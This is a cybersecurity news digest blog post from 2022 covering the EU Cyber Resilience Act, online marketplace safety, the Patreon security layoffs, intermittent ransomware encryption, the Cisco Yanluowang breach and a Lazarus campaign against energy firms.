AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 09/12/2022

EU to introduce strict IoT security regulation

The EU is set to introduce a law that would require smart devices to follow strict cyber security rules, on threat of a device ban. Internet of Things (IoT) devices such as smart home controls or fitness trackers are becoming more ubiquitous, making life more convenient while also increasing the vectors through which threat actors can perpetrate cyber crime. The proposal, which Reuters reports is titled the Cyber Resilience Act, will be formally put forward on 13 September. Once law, smart device manufacturers will be required to review the risk profiles of their products and fix any discovered vulnerabilities.  In the event of a problem or threat being discovered, the law will also require companies to notify the European Union Agency for Cybersecurity (ENISA) within 24 hours.


Transacting in Person with Strangers from the Internet

Communities like Craigslist, OfferUp, Facebook Marketplace and others are great for finding low- or no-cost stuff that one can pick up directly from a nearby seller, and for getting rid of useful things that don’t deserve to end up in a landfill. But when dealing with strangers from the Internet, there is always a risk that the person you’ve agreed to meet has other intentions. Nearly all U.S. states now have designated safe trading stations — mostly at local police departments — which ensure that all transactions are handled in plain view of both the authorities and security cameras. These safe trading places exist is because sometimes in-person transactions from the Internet don’t end well for one or more parties involved. The website Craigslistkillers has catalogued news links for at least 132 murders linked to Craigslist transactions since 2015. Many of these killings involved high-priced items like automobiles and consumer electronics, where the prospective buyer apparently intended all along to kill the owner and steal the item offered for sale. Others were motivated simply by a desire to hurt people.


Patreon security team layoffs cause backlash in creator community

Patreon laid off its security team this week, according to several former employees, sparking cybersecurity concerns among users who are increasingly threatening to leave the platform. The layoffs gained visibility after noted privacy lawyer Whitney Merrill tweeted a LinkedIn post from former Patreon privacy engineer Emily Metcalfe. “Wouldn’t trust my data there,” Merrill said on Twitter. Patreon, which boasts as many as 8 million monthly users on its platform for fans to support creators and artists, suffered a major breach in 2015. Hackers broke into the company’s user database and released several gigabytes of internal data including usernames, email address and mail addresses. No credit-card numbers or Social Security numbers were accessed in the breach, the company said at the time.


Ransomware gangs switching to new intermittent encryption tactic

A growing number of ransomware groups are adopting a new tactic that helps them encrypt their victims’ systems faster while reducing the chances of being detected and stopped. This tactic is called intermittent encryption, and it consists of encrypting only parts of the targeted files’ content, which would still render the data unrecoverable without using a valid decryptor+key. For example, by skipping every other 16 bytes of a file, the encryption process takes almost half of the time required for full encryption but still locks the contents for good. Additionally, because the encryption is milder, automated detection tools that rely on detecting signs of trouble in the form of intense file IO operations are more likely to fail.


Cisco confirms that data leaked by the Yanluowang ransomware gang were stolen from its systems

In August, Cisco disclosed a security breach, the Yanluowang ransomware gang breached its corporate network in late May and stole internal data. The investigation conducted by Cisco Security Incident Response (CSIRT) and Cisco Talos revealed that threat actors compromised a Cisco employee’s credentials after they gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized. Once obtained the credentials, the attackers launched voice phishing attacks in an attempt to trick the victim into accepting the MFA push notification started by the attacker.


North Korean Lazarus Group Hacked Energy Providers Worldwide

A malicious campaign conducted by the North Korean threat actor Lazarus Group targeted energy providers around the world between February and July 2022. The campaign was previously partially disclosed by Symantec and AhnLab in April and May, respectively, but Cisco Talos is now providing more details about it. Writing in an advisory on Thursday, the security researchers said the Lazarus campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain initial access to targeted organizations. “The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post–exploitation led to the download of their toolkit from web servers,” the team wrote. “In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to.”

Related Posts